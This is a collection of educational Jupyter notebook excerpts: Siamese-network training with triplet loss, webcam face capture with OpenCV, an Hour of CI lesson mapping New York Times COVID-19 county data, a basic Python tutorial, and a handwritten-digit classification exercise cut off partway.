# Expand the array at the selected index into useable images
another_sample_img = np.expand_dims(x_test[another_sample_img_idx],axis=0)
# Add the image to the support set
sample_imgs = np.append(sample_imgs, another_sample_img, axis=0)
distances_from_img_to_test_against = []
# As the img to test against is in index 0, we compare distances between img@0 and all others
for i in range(1, len(sample_embeddings)):
distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))
# + 1 as distances_from_img_to_test_against doesn't include the test image
min_index = distances_from_img_to_test_against.index(min(distances_from_img_to_test_against)) + 1
return sample_imgs, min_index
def evaluate(embedding_model, epochs = 0):
probs,yprob = compute_probs(embedding_model, x_test[:500, :], y_test[:500])
fpr, tpr, thresholds, auc = compute_metrics(probs,yprob)
draw_roc(fpr, tpr, thresholds, auc)
draw_interdist(embedding_model, epochs)
for i in range(3):
DrawTestImage(embedding_model, np.expand_dims(x_train[i],axis=0))
```
### Model Training Setup
FaceNet, the original triplet batch paper, draws a large random sample of triplets respecting the class distribution then picks N/2 hard and N/2 random samples (N = batch size), along with an `alpha` of 0.2
Logs out to Tensorboard, callback adapted from https://stackoverflow.com/a/52581175.
Saves best model only based on a validation loss. Adapted from https://stackoverflow.com/a/58103272.
```
# Hyperparams
batch_size = 256
epochs = 100
steps_per_epoch = int(x_train.shape[0]/batch_size)
val_steps = int(x_test.shape[0]/batch_size)
alpha = 0.2
num_hard = int(batch_size * 0.5) # Number of semi-hard triplet examples in the batch
lr = 0.00006
optimiser = 'Adam'
emb_size = 10
with tf.device("/cpu:0"):
# Create the embedding model
print("Generating embedding model... \n")
embedding_model = create_embedding_model(emb_size)
print("\nGenerating SNN... \n")
# Create the SNN
siamese_net = create_SNN(embedding_model)
# Compile the SNN
optimiser_obj = Adam(lr = lr)
siamese_net.compile(loss=triplet_loss, optimizer= optimiser_obj)
# Store visualisations of the embeddings using PCA for display next to "after training" for comparisons
num_vis = 500 # Take only the first num_vis elements of the test set to visualise
embeddings_before_train = embedding_model.predict(x_test[:num_vis, :])
pca = PCA(n_components=2)
decomposed_embeddings_before = pca.fit_transform(embeddings_before_train)
# Display evaluation the untrained model
print("\nEvaluating the model without training for a baseline...\n")
evaluate(embedding_model)
# Set up logging directory
## Use date-time as logdir name:
#dt = datetime.now().strftime("%Y%m%dT%H%M")
#logdir = os.path.join("PATH/TO/LOGDIR",dt)
## Use a custom non-dt name:
name = "snn-example-run"
logdir = os.path.join("PATH/TO/LOGDIR",name)
if not os.path.exists(logdir):
os.mkdir(logdir)
## Callbacks:
# Create the TensorBoard callback
tensorboard = tf.keras.callbacks.TensorBoard(
log_dir = logdir,
histogram_freq=0,
batch_size=batch_size,
write_graph=True,
write_grads=True,
write_images = True,
update_freq = 'epoch',
profile_batch=0
)
# Training logger
csv_log = os.path.join(logdir, 'training.csv')
csv_logger = CSVLogger(csv_log, separator=',', append=True)
# Only save the best model weights based on the val_loss
checkpoint = ModelCheckpoint(os.path.join(logdir, 'snn_model-{epoch:02d}-{val_loss:.2f}.h5'),
monitor='val_loss', verbose=1,
save_best_only=True, save_weights_only=True,
mode='auto')
# Save the embedding mode weights based on the main model's val loss
# This is needed to reecreate the emebedding model should we wish to visualise
# the latent space at the saved epoch
class SaveEmbeddingModelWeights(Callback):
def __init__(self, filepath, monitor='val_loss', verbose=1):
super(Callback, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.best = np.Inf
self.filepath = filepath
def on_epoch_end(self, epoch, logs={}):
current = logs.get(self.monitor)
if current is None:
warnings.warn("SaveEmbeddingModelWeights requires %s available!" % self.monitor, RuntimeWarning)
if current < self.best:
filepath = self.filepath.format(epoch=epoch + 1, **logs)
#if self.verbose == 1:
#print("Saving embedding model weights at %s" % filepath)
embedding_model.save_weights(filepath, overwrite = True)
self.best = current
# Save the embedding model weights if you save a new snn best model based on the model checkpoint above
emb_weight_saver = SaveEmbeddingModelWeights(os.path.join(logdir, 'emb_model-{epoch:02d}.h5'))
callbacks = [tensorboard, csv_logger, checkpoint, emb_weight_saver]
# Save model configs to JSON
model_json = siamese_net.to_json()
with open(os.path.join(logdir, "siamese_config.json"), "w") as json_file:
json_file.write(model_json)
json_file.close()
model_json = embedding_model.to_json()
with open(os.path.join(logdir, "embedding_config.json"), "w") as json_file:
json_file.write(model_json)
json_file.close()
hyperparams = {'batch_size' : batch_size,
'epochs' : epochs,
'steps_per_epoch' : steps_per_epoch,
'val_steps' : val_steps,
'alpha' : alpha,
'num_hard' : num_hard,
'optimiser' : optimiser,
'lr' : lr,
'emb_size' : emb_size
}
with open(os.path.join(logdir, "hyperparams.json"), "w") as json_file:
json.dump(hyperparams, json_file)
# Set the model to TB
tensorboard.set_model(siamese_net)
def delete_older_model_files(filepath):
model_dir = filepath.split("emb_model")[0]
# Get model files
model_files = os.listdir(model_dir)
# Get only the emb_model files
emb_model_files = [file for file in model_files if "emb_model" in file]
# Get the epoch nums of the emb_model_files
emb_model_files_epoch_nums = [int(file.split("-")[1].split(".h5")[0]) for file in emb_model_files]
# Find all the snn model files
snn_model_files = [file for file in model_files if "snn_model" in file]
# Sort, get highest epoch num
emb_model_files_epoch_nums.sort()
highest_epoch_num = str(emb_model_files_epoch_nums[-1]).zfill(2)
# Filter the emb_model and snn_model file lists to remove the highest epoch number ones
emb_model_files_without_highest = [file for file in emb_model_files if highest_epoch_num not in file]
snn_model_files_without_highest = [file for file in snn_model_files if ("-" + highest_epoch_num + "-") not in file]
# Delete the non-highest model files from the subdir
if len(emb_model_files_without_highest) != 0:
print("Deleting previous best model file")
for model_file_list in [emb_model_files_without_highest, snn_model_files_without_highest]:
for file in model_file_list:
os.remove(os.path.join(model_dir, file))
```
### Show example batches
Based on code found [here](https://zhangruochi.com/Create-a-Siamese-Network-with-Triplet-Loss-in-Keras/2020/08/11/).
```
# Display sample batches. This has to be performed after the embedding model is created
# as create_batch_hard utilises the model to see which batches are actually hard.
examples = create_batch(1)
print("Example triplet batch:")
plot_triplets(examples)
print("Example semi-hard triplet batch:")
ex_hard = create_hard_batch(1, 1, split="train")
plot_triplets(ex_hard)
```
### Training
Using `.fit(workers = 0)` fixes the error when using hard batches where TF can't predict on the embedding network whilst fitting the siamese network (see: https://github.com/keras-team/keras/issues/5511#issuecomment-427666222).
```
def get_num_gpus():
local_device_protos = device_lib.list_local_devices()
return len([x.name for x in local_device_protos if x.device_type == 'GPU'])
## Training:
#print("Logging out to Tensorboard at:", logdir)
print("Starting training process!")
print("-------------------------------------")
# Make the model work over the two GPUs we have
num_gpus = get_num_gpus()
parallel_snn = multi_gpu_model(siamese_net, gpus = num_gpus)
batch_per_gpu = int(batch_size / num_gpus)
parallel_snn.compile(loss=triplet_loss, optimizer= optimiser_obj)
siamese_history = parallel_snn.fit(
data_generator(batch_per_gpu, num_hard),
steps_per_epoch=steps_per_epoch,
epochs=epochs,
verbose=1,
callbacks=callbacks,
workers = 0,
validation_data = data_generator(batch_per_gpu, num_hard, split="test"),
validation_steps = val_steps)
print("-------------------------------------")
print("Training complete.")
```
### Evaluate the trained network
Load the best performing models. We need to load the weights and configs seperately rather than using model.load() as our custom loss function relies on the embedding length. As such, it is easier to load the weights and config seperately and build a model based on them.
```
def json_to_dict(json_src):
with open(json_src, 'r') as j:
return json.loads(j.read())
## Load in best trained SNN and emb model
# The best performing model weights has the higher epoch number due to only saving the best weights
highest_epoch = 0
dir_list = os.listdir(logdir)
for file in dir_list:
if file.endswith(".h5"):
epoch_num = int(file.split("-")[1].split(".h5")[0])
if epoch_num > highest_epoch:
highest_epoch = epoch_num
# Find the embedding and SNN weights src for the highest_epoch (best) model
for file in dir_list:
# Zfill ensure a leading 0 on number < 10
if ("-" + str(highest_epoch).zfill(2)) in file:
if file.startswith("emb"):
embedding_weights_src = os.path.join(logdir, file)
elif file.startswith("snn"):
snn_weights_src = os.path.join(logdir, file)
hyperparams = os.path.join(logdir, "hyperparams.json")
snn_config = os.path.join(logdir, "siamese_config.json")
emb_config = os.path.join(logdir, "embedding_config.json")
snn_config = json_to_dict(snn_config)
emb_config = json_to_dict(emb_config)
# json.dumps to make the dict a string, as required by model_from_json
loaded_snn_model = model_from_json(json.dumps(snn_config))
loaded_snn_model.load_weights(snn_weights_src)
loaded_emb_model = model_from_json(json.dumps(emb_config))
loaded_emb_model.load_weights(embedding_weights_src)
# Store visualisations of the embeddings using PCA for display next to "after training" for comparisons
embeddings_after_train = loaded_emb_model.predict(x_test[:num_vis, :])
pca = PCA(n_components=2)
decomposed_embeddings_after = pca.fit_transform(embeddings_after_train)
evaluate(loaded_emb_model, highest_epoch)
```
### Comparisons of the embeddings in the latent space
Based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).
```
step = 1 # Step = 1, take every element
dict_embeddings = {}
dict_gray = {}
test_class_labels = np.unique(np.array(y_test))
decomposed_embeddings_after = pca.fit_transform(embeddings_after_train)
fig = plt.figure(figsize=(16, 8))
for label in test_class_labels:
y_test_labels = y_test[:num_vis]
decomposed_embeddings_class_before = decomposed_embeddings_before[y_test_labels == label]
decomposed_embeddings_class_after = decomposed_embeddings_after[y_test_labels == label]
plt.subplot(1,2,1)
plt.scatter(decomposed_embeddings_class_before[::step, 1], decomposed_embeddings_class_before[::step, 0], label=str(label))
plt.title('Embedding Locations Before Training')
plt.legend()
plt.subplot(1,2,2)
plt.scatter(decomposed_embeddings_class_after[::step, 1], decomposed_embeddings_class_after[::step, 0], label=str(label))
plt.title('Embedding Locations After %d Training Epochs' % epochs)
plt.legend()
plt.show()
```
### Determine n_way_accuracy
```
prototypes = generate_prototypes(x_test, y_test, loaded_emb_model)
n_way_accuracy_prototypes(val_steps, num_classes, loaded_emb_model)
```
### Visualise support set inference
Based on code found [here](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).
```
n_samples = 10
sample_imgs, min_index = visualise_n_way_prototypes(n_samples, loaded_emb_model)
img_matrix = []
for index in range(1, len(sample_imgs)):
img_matrix.append(np.reshape(sample_imgs[index], (x_train_w, x_train_h)))
img_matrix = np.asarray(img_matrix)
img_matrix = np.vstack(img_matrix)
f, ax = plt.subplots(1, 3, figsize = (10, 12))
f.tight_layout()
ax[0].imshow(np.reshape(sample_imgs[0], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
ax[0].set_title("Test Image")
ax[1].imshow(img_matrix ,vmin=0, vmax=1,cmap='Greys')
ax[1].set_title("Support Set (Img of same class shown first)")
ax[2].imshow(np.reshape(sample_imgs[min_index], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
ax[2].set_title("Image most similar to Test Image in Support Set")
```
|
github_jupyter
|
```
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as image
import os
import cv2
capture = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')
#Iterate to save data for each face
face_data = []
face_name = input("Enter face name :")
face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')
dataset_path = './data/'
#non-unique count, faces captured in total
facecount = 0
while True:
#ret is a return code, frame is the frame captured
ret, frame = capture.read()
#convert to grayscale if needed
grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#ret is false if frame was not captured properly, so we ignore that particular frame
if ret == False:
continue
#stores the faces coordinates in rectangle start, width and height
faces = face_cascade.detectMultiScale(grayscale, 1.3, 5)
#iterating over each face detected in that particular frame
for face in faces:
#extracting our values from face
x,y,w,h = face
#offset value to increase our displayed rectangle size
offset = 50
#creating a rectangle using the coordinates known, top-left and bottom-right, color, and width
cv2.rectangle(grayscale, (x - offset, y - offset), (x+w+offset, y+h+offset), (255,255,255), 4)
#Slice of frame to select out face part
face_section = grayscale[y - offset : y + h + offset, x - offset : x + w + offset]
#resizing face section to a particular standard so that we will be able to apply KNN later
face_section = cv2.resize(face_section, (100,100))
#Storing facial data
face_data.append(face_section)
#increment facecount, better to interpret as framecount or size of training data
facecount += 1
print(facecount)
cv2.imshow("Face Detection", grayscale)
#first and operation basically gets key from user and compares it to binary equivalent of mentioned key
#loop breaks if key matches
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#releases capture interface
capture.release()
#closes any windows created, not doing so will cause process to freeze
cv2.destroyAllWindows()
#convert tuple to numpy array
face_data = np.asarray(face_data)
#resize, flattening to 1d rows, -1 causes other dimensions to adjust in favor of mantaining specified ones
face_data = face_data.reshape((face_data.shape[0],-1))
print(np.shape(face_data))
#saving data to path
np.save(dataset_path + face_name, face_data)
```
|
github_jupyter
|
# Gateway Exploration
In this final segment you can take what you have learned and try it yourself. This segment is displayed in "Notebook Mode" rather than "Presentation Mode." So you will need to scroll down as you explore more content. Notebook mode will allow you to see more content at once. It also allows you to compare and contrast cells and visualizations.
Here you are free to explore as much as you want. There are lots of suggestions in the text and in comments in the code cells. Feel free to change attributes, code pieces, etc. If a code cell breaks (e.g., you see an error), then use a search engine to look up the error to see if you can try to solve it yourself. Another way to fix problems is to compare your code to the original code, which you can see here:
https://github.com/hourofci/lessons-dev/blob/master/gateway-lesson/gateway/gateway-exploration.ipynb
Enjoy two explorations to apply what you learned at a deeper level
1. Data Wrangling - View, Clean, Extract, and Merge Data
2. Data Visualization - Making Maps
So start scrolling down. Explore and try it yourself!
```
# This code cell starts the necessary setup for Hour of CI lesson notebooks.
# First, it enables users to hide and unhide code by producing a 'Toggle raw code' button below.
# Second, it imports the hourofci package, which is necessary for lessons and interactive Jupyter Widgets.
# Third, it helps hide/control other aspects of Jupyter Notebooks to improve the user experience
# This is an initialization cell
# It is not displayed because the Slide Type is 'Skip'
from IPython.display import HTML, IFrame, Javascript, display
from ipywidgets import interactive
import ipywidgets as widgets
from ipywidgets import Layout
import getpass # This library allows us to get the username (User agent string)
# import package for hourofci project
import sys
sys.path.append('../../supplementary') # relative path (may change depending on the location of the lesson notebook)
import hourofci
# Retreive the user agent string, it will be passed to the hourofci submit button
agent_js = """
IPython.notebook.kernel.execute("user_agent = " + "'" + navigator.userAgent + "'");
"""
Javascript(agent_js)
# load javascript to initialize/hide cells, get user agent string, and hide output indicator
# hide code by introducing a toggle button "Toggle raw code"
HTML('''
<script type="text/javascript" src=\"../../supplementary/js/custom.js\"></script>
<input id="toggle_code" type="button" value="Toggle raw code">
''')
```
## Setup
As always, you have to import the specific Python packages you'll need. You'll learn more about these in the other lessons, so for now let's import all of the packages that we will use for the Gateway Exploration component. If you want to dig deeper, feel free to search each package to understand what it does and what it can do for you.
As before, run this code by clicking the Run button left of the code cell.
Wait for the code to run. This is shown by the asterisk inside the brackets of <pre>In [ ]:</pre>. When it changes to a number and the print output shows up, you're good to go.
```
# Run this code by clicking the Run button on the left to import all of the packages
from matplotlib import pyplot
import pandas
import geopandas
import os
import pprint
import IPython
from shapely.geometry import Polygon
import numpy as np
from datetime import datetime
print("Modules imported")
```
## Download COVID-19 Data
This optional code cell will download the US county level data released by the New York Times that we demonstrated earlier. It's found here: https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv.
The code below gets the data from the URL and puts it into a local file called "us-counties.csv"
Skip this step if you already downloaded this data in an earlier segment. You can always come back and re-run it if you need to.
```
# Run this code cell if you have not yet downloaded the Covid-19 data from the New York Times
!wget https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv -O us-counties.csv
```
## Exploration 1: View, Clean, Extract, and Merge Data
### View the data
Once you have downloaded the data file, you should look at it to make sure it is what you want.
To do that, we'll convert the downloaded file into a format that our Python program can use. Here we're going to use the dataframe format provided by the Pandas package.
Recall that dataframes can be though of as two dimensional arrays or spreadsheets.
```
#Read the data that we downloaded from the NYT into a dataframe
covid_counties = pandas.read_csv('./us-counties.csv')
# And let's see what it looks like!
print(covid_counties)
```
### Clean the Data
In large data like this, there are often a few cells scattered around that may cause you problems. Cleaning data is an important and often complex step, it is one part of **data wrangling.** For now, let's just look for the most common problem - empty cells where a value is expected. These are known as null cells and if a number is expected it will show up as NaN (not a number) in your dataframe.
Let's see if we can find if we have any of these in our data.
Since we're going to use the "fips" column to group our data, we need to know that there no null cells in that column. (The "FIPS" code is a unique identifier for geographic places. Google it if you want to know more!)
```
#Are there NaN cells in the fips column?
covid_counties['fips'].isnull().values.any()
#How many null cells are in the fips column?
count_nan = covid_counties['fips'].isnull().sum()
print ('Count of rows with null fips codes: ' + str(count_nan))
```
Ah ha, we found lots of problems in our data!
Let's see what these rows containing null cells look like. Here we'll make a temporary dataframe that contains the rows with null fips codes.
```
covid_counties_clean = covid_counties[covid_counties['fips'].notnull()]
print(covid_counties_clean)
```
### Extract Data
Since we have a row for each day in the dataset, we will use the **groupby** function to group _daily cases_ by _county_. Since some county names are found in more than one state, we have to group by _county_ and _state_ (as well as the fips code, to be sure). We will add them all up using the **sum** function.
```
# In our earlier segment we only looked at cases.
# What if we also wanted to look at deaths?
# Here we replaced ['cases'] with ['cases', 'deaths'] below.
# This will group both cases and deaths by fips, county, and state values.
covid_grouped = covid_counties.groupby(['fips','county','state'])['cases', 'deaths']
# Second, add up all the Covid-19 cases using sum
covid_total = covid_grouped.sum()
#View the result, which should include the columns "fips, county, state, cases, deaths"
covid_total
```
Now we could apply some basic arithmetic for the rows using Pandas.
Let's get the number of deaths per case for each county. This is called the Case Fatality Rather (CFR). We multiply by 100.0 to get the percentage at the end.
Before you run the code, make sure you understand that we are dividing deaths by cases for each row.
```
covid_total['deathpercase']=covid_total['deaths']/covid_total['cases']*100.0
# Print out the new 'covid_total' dataframe with a new 'deathpercase' column
covid_total
```
Now that we have our data we can try some basic visualizations. Let's try making a scatter plot of cases on the x-axis and deaths on the y-axis.
```
covid_total.plot.scatter(x='cases', y='deaths')
```
Here are a few things you can try adding to the scatter function as parameters (remember to use commas to separate each of them).
```python
# Change the size of the dots
# s=covid_total['deathpercase']
# s=covid_total['deathpercase']*2
```
And, try a hex-bin plot.
```
covid_total.plot.hexbin(x='cases', y='deaths', gridsize=5)
```
### Merge data
Now we'll load "supplementary/counties_geometry.geojson" into a geodataframe. You loaded this same file in an earlier segment on mapping Covid-19. We will (again) use **merge** to merge these two datasets into a **merged** geodataframe.
```
counties_geojson = geopandas.read_file("./supplementary/counties_geometry.geojson")
# Merge geography (counties_geojson) and covid cases and deaths (covid_total)
merged = pandas.merge(counties_geojson, covid_total, how='left',
left_on=['NAME','state_name'], right_on = ['county','state'])
# Let's take a quick look at our new merged geodataframe
merged
```
## 2. More Mapping
Now that we have a merged dataset. We can try to create a few different maps. In this Exploration you can try to improve your first map.
Here is the code from your first map. Run this code and then scroll down.
```
merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend="true",
legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})
pyplot.title("Number of Confirmed Cases")
```
Below is that code chunk again. Now you can try changing the code to improve the look of your map. There are a lot of options to change.
<u>If you break something, then just copy and paste the original code above to "reset".</u>
- *column* represents the column that is being mapped. Change what you are mapping by replacing 'cases' with 'deaths' or 'deathpercase'
- *cmap* represents the colormap. You can try any number of these by replacing 'OrRd' with: 'Purples' or 'Greens' or 'gist_gray'. There are lot of choices that you can see here: https://matplotlib.org/tutorials/colors/colormaps.html. If you want to learn more about color schemes check out: https://colorbrewer2.org
- *scheme* represents the scheme for creating classes. Try a few other options by replacing 'fisher_jenks' with: 'natural_breaks' or 'quantiles'
- *loc* represents the location of your legend. Move your legend by replacing 'lower left' with 'upper right' or 'upper left'
- *title* represents the text in the legend box. If you changed the column that you are mapping, make sure to change the title too.
Want to try more? Check out here for even more options
https://geopandas.org/mapping.html#choropleth-maps
```
merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend="true",
legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})
pyplot.title("Number of Confirmed Cases")
```
# Congratulations!
**You have finished an Hour of CI!**
But, before you go ...
1. Please fill out a very brief questionnaire to provide feedback and help us improve the Hour of CI lessons. It is fast and your feedback is very important to let us know what you learned and how we can improve the lessons in the future.
2. If you would like a certificate, then please type your name below and click "Create Certificate" and you will be presented with a PDF certificate.
<font size="+1"><a style="background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;" href="https://forms.gle/JUUBm76rLB8iYppN7">Take the questionnaire and provide feedback</a></font>
```
# This code cell loads the Interact Textbox that will ask users for their name
# Once they click "Create Certificate" then it will add their name to the certificate template
# And present them a PDF certificate
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from ipywidgets import interact
def make_cert(learner_name, lesson_name):
cert_filename = 'hourofci_certificate.pdf'
img = Image.open("../../supplementary/hci-certificate-template.jpg")
draw = ImageDraw.Draw(img)
cert_font = ImageFont.truetype('../../supplementary/cruft.ttf', 150)
cert_fontsm = ImageFont.truetype('../../supplementary/cruft.ttf', 80)
w,h = cert_font.getsize(learner_name)
draw.text( xy = (1650-w/2,1100-h/2), text = learner_name, fill=(0,0,0),font=cert_font)
w,h = cert_fontsm.getsize(lesson_name)
draw.text( xy = (1650-w/2,1100-h/2 + 750), text = lesson_name, fill=(0,0,0),font=cert_fontsm)
img.save(cert_filename, "PDF", resolution=100.0)
return cert_filename
interact_cert=interact.options(manual=True, manual_name="Create Certificate")
@interact_cert(name="Your Name")
def f(name):
print("Congratulations",name)
filename = make_cert(name, 'Gateway')
print("Download your certificate by clicking the link below.")
```
<font size="+1"><a style="background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;" href="hourofci_certificate.pdf?download=1" download="hourofci_certificate.pdf">Download your certificate</a></font>
|
github_jupyter
|
# Welcome to Python!
There are many excellent Python and Jupyter/IPython tutorials out there. This Notebook contains a few snippets of code from here and there, but we suggest you go over some in-depth tutorials, especially if you are not familiar with Python.
Here we borrow some material from:
- [A Crash Course in Python for Scientists](http://nbviewer.ipython.org/gist/rpmuller/5920182) (which itself contains some nice links to other tutorials),
- [matplotlib examples](http://matplotlib.org/gallery.html#),
- [Chapter 1 from Pandas Cookbook](http://nbviewer.ipython.org/github/jvns/pandas-cookbook/tree/master/cookbook/)
This short introduction is itself written in Jupyter Notebook. See the Project 0 setup instructions to start a Jupyter server and open this notebook there.
As a starting point, you can simply type in expressions into the python shell in the browser.
```
8+8
```
Enter will continue the **cell**. If you want to execute the commands, you can either press the **play** button, or use Shift+Enter
```
days_of_the_week = ["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]
for day in days_of_the_week:
statement = "Today is " + day
print(statement)
```
The above code uses a List. In case you haven't realized this yet, Python uses "indentation" to decide the scope, so there is no need to enclose code within {} or similar constructs.
The other data structures in Python include Tuples and Dictionaries. Tuples are similar to Lists, but are immutable so we can't modify it (say by appending). Dictionaries are similar to Maps.
```
tuple1 = (1,2,'hi',9.0)
tuple1
# The following code will give an error since we are trying to change an immutable object
tuple1.append(7)
ages_dictionary = {"Rick": 46, "Bob": 86, "Fred": 21}
print("Rick's age is ",ages_dictionary["Rick"])
```
### Functions
Here we write a quick function to compute the Fibonacci sequence (remember this from Discrete Math?)
```
def fibonacci(sequence_length):
"Return the Fibonacci sequence of length *sequence_length*"
sequence = [0,1]
if sequence_length < 1:
print("Fibonacci sequence only defined for length 1 or greater")
return
if 0 < sequence_length < 3:
return sequence[:sequence_length]
for i in range(2,sequence_length):
sequence.append(sequence[i-1]+sequence[i-2])
return sequence
help(fibonacci)
fibonacci(10)
```
The following function shows several interesting features, including the ability to return multiple values as a tuple, and the idea of "tuple assignment", where objects are unpacked into variables (the first line after for).
```
positions = [
('Bob',0.0,21.0),
('Cat',2.5,13.1),
('Dog',33.0,1.2)
]
def minmax(objects):
minx = 1e20 # These are set to really big numbers
miny = 1e20
for obj in objects:
name,x,y = obj
if x < minx:
minx = x
if y < miny:
miny = y
return minx,miny
x,y = minmax(positions)
print(x,y)
import bs4
import requests
bs4
requests
from bs4 import BeautifulSoup
```
From here you could write a script to say, scrape a webpage. We will dive more into this in a future class when we look at data scraping.
|
github_jupyter
|
# Multi-class Classification and Neural Networks
## 1. Multi-class Classification
In this exercise, we will use logistic regression and neural networks to recognize handwritten digits (from 0 to 9).
### 1.1 Dataset
The dataset ex3data1.mat contains 5000 training examples of handwritten digits. Each training example is a 20 pixel by 20 pixel grayscale image of the digit. Each pixel is represented by a floating point number indicating the grayscale intensity at that location (value between -1 and 1). The 20 by 20 grid of pixels are flattened into a 400 long vector. Each training example is a single row in data matrix X. This results in a 5000 by 400 matrix X where every row is a training example.
$$ X=\left[\matrix{-(x^{(1)})^T-\\ -(x^{(2)})^T-\\ \vdots\\ -(x^{(m)})^T-}\right]_{5000\times400} $$
The other dtat in the training set is a 5000 long vector y that contains labels for the training set. Since the data was prepared for MATLAB, in which index starts from 1, digits 0-9 have been converted to 1-10. Here, we will convert it back to using 0-9 as labels.
```
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
from scipy.io import loadmat
data = loadmat('ex3data1.mat')
X = data["X"] # 5000x400 np array
y = data["y"] # 5000x1 np array (2d)
y = y.flatten() # change to (5000,) 1d array and
y[y==10] = 0 # convert to 0-9 scale from 1-10 scale
```
### 1.2 Visualizing the data
```
def displayData(X):
"""displays the 100 rows of digit image data stored in X in a nice grid.
It returns the figure handle fig, ax
"""
# form the big 10 x 10 matrix containing all 100 images data
# padding between 2 images
pad = 1
# initialize matrix with -1 (black)
wholeimage = -np.ones((20*10+9, 20*10+9))
# fill values
for i in range(10):
for j in range(10):
wholeimage[j*21:j*21+20, i*21:i*21+20] = X[10*i+j, :].reshape((20, 20))
fig, ax = plt.subplots(figsize=(6, 6))
ax.imshow(wholeimage.T, cmap=plt.cm.gray, vmin=-1, vmax=1)
ax.axis('off')
return fig, ax
x = X[3200:3300, :]
fig, ax = displayData(x)
ax.axis('off')
# randomly select 100 data points to display
rand_indices = np.random.randint(0, 5000, size=100)
sel = X[rand_indices, :]
# display images
fig, ax = displayData(sel)
```
### 1.3 Vectorizing Logistic Regression
Since it's already been vectorized in assignment 2, we will just copy the functions here, just renaming it to lrCostFunction(). This includes regularization.
```
def sigmoid(z):
"""sigmoid(z) computes the sigmoid of z. z can be a number,
vector, or matrix.
"""
g = 1 / (1 + np.exp(-z))
return g
def lrCostFucntion(theta, X, y, lmd):
"""computes the cost of using
% theta as the parameter for regularized logistic regression and the
% gradient of the cost w.r.t. to the parameters.
"""
m = len(y)
# prepare for matrix calculations
y = y[:, np.newaxis]
# to prevent error in scipy.optimize.minimize(method='CG')
# unroll theta first, make sure theta is (n+1) by 1 array
theta = theta.ravel()
theta = theta[:, np.newaxis]
# print('theta: {}'.format(theta.shape))
# print('X: {}'.format(X.shape))
# print('y: {}'.format(y.shape))
# cost
J = (-y.T@np.log(sigmoid(X@theta)))/m - ((1-y.T)@np.log(1-sigmoid(X@theta)))/m + (theta[1:].T@theta[1:])*lmd/(2*m)
# J = J[0, 0]
# gradient
grad = np.zeros(theta.shape)
# added newaxis in order to get 2d array instead of 1d array
grad[0] = X.T[0, np.newaxis, :]@(sigmoid(X@theta)-y)/m
grad[1:] = X.T[1:, :]@(sigmoid(X@theta)-y)/m + lmd*theta[1:]/m
return J, grad.flatten()
# Test lrCostFunction
theta_t = np.array([-2, -1, 1, 2])
X_t = np.concatenate((np.ones((5, 1)), np.arange(1, 16).reshape((5, 3), order='F')/10), axis=1)
y_t = np.array([1, 0, 1, 0, 1])
lambda_t = 3
J, grad = lrCostFucntion(theta_t, X_t, y_t, lambda_t)
print('Cost: {:.6f}'.format(J[0, 0]))
print('Expected: 2.534819')
print('Gradients: \n{}'.format(grad))
print('Expected: \n0.146561\n -0.548558\n 0.724722\n 1.398003\n')
```
### 1.4 One-vs-all Classification
Here, we implement one-vs-all classification by training multiple regularized logistic regression classifier, one for each of the K classes in our dataset. K=10 in this case.
```
from scipy.optimize import minimize
def oneVsAll(X, y, num_class, lmd):
"""trains num_labels logistic regression classifiers and returns each of these classifiers
% in a matrix all_theta, where the i-th row of all_theta corresponds
% to the classifier for label i
"""
# m is number of training samples, n is number of features + 1
m, n = X.shape
# store theta results
all_theta = np.zeros((num_class, n))
#print(all_theta.shape)
# initial conidition, 1d array
theta0 = np.zeros(n)
print(theta0.shape)
# train one theta at a time
for i in range(num_class):
# y should be either 0 or 1, representing true or false
ylabel = (y==i).astype(int)
# run optimization
result = minimize(lrCostFucntion, theta0, args=(X, ylabel, lmd), method='CG',
jac=True, options={'disp': True, 'maxiter':1000})
# print(result)
all_theta[i, :] = result.x
return all_theta
# prepare parameters
lmd = 0.1
m = len(y)
X_wb = np.concatenate((np.ones((m, 1)), X), axis=1)
num_class = 10 # 10 classes, digits 0 to 9
print(X_wb.shape)
print(y.shape)
# Run training
all_theta = oneVsAll(X_wb, y, num_class, lmd)
```
#### One-vs-all Prediction
```
def predictOneVsAll(all_theta, X):
"""will return a vector of predictions
% for each example in the matrix X. Note that X contains the examples in
% rows. all_theta is a matrix where the i-th row is a trained logistic
% regression theta vector for the i-th class. You should return column vector
% of values from 1..K (e.g., p = [1; 3; 1; 2] predicts classes 1, 3, 1, 2
% for 4 examples)
"""
# apply np.argmax to the output matrix to find the predicted label
# for that training sample
out = (all_theta @ X.T).T
#print(out[4000:4020, :])
return np.argmax(out, axis=1)
# prediction accuracy
pred = predictOneVsAll(all_theta, X_wb)
print(pred.shape)
accuracy = np.sum((pred==y).astype(int))/m*100
print('Training accuracy is {:.2f}%'.format(accuracy))
```
## 2. Neural Networks
In the previous part of this exercise, you implemented multi-class logistic re-
gression to recognize handwritten digits. However, logistic regression cannot
form more complex hypotheses as it is only a linear classifier.3
In this part of the exercise, you will implement a neural network to rec-
ognize handwritten digits using the same training set as before. The neural
network will be able to represent complex models that form non-linear hy-
potheses.
For this week, you will be using parameters from a neural network
that we have already trained. Your goal is to implement the feedforward
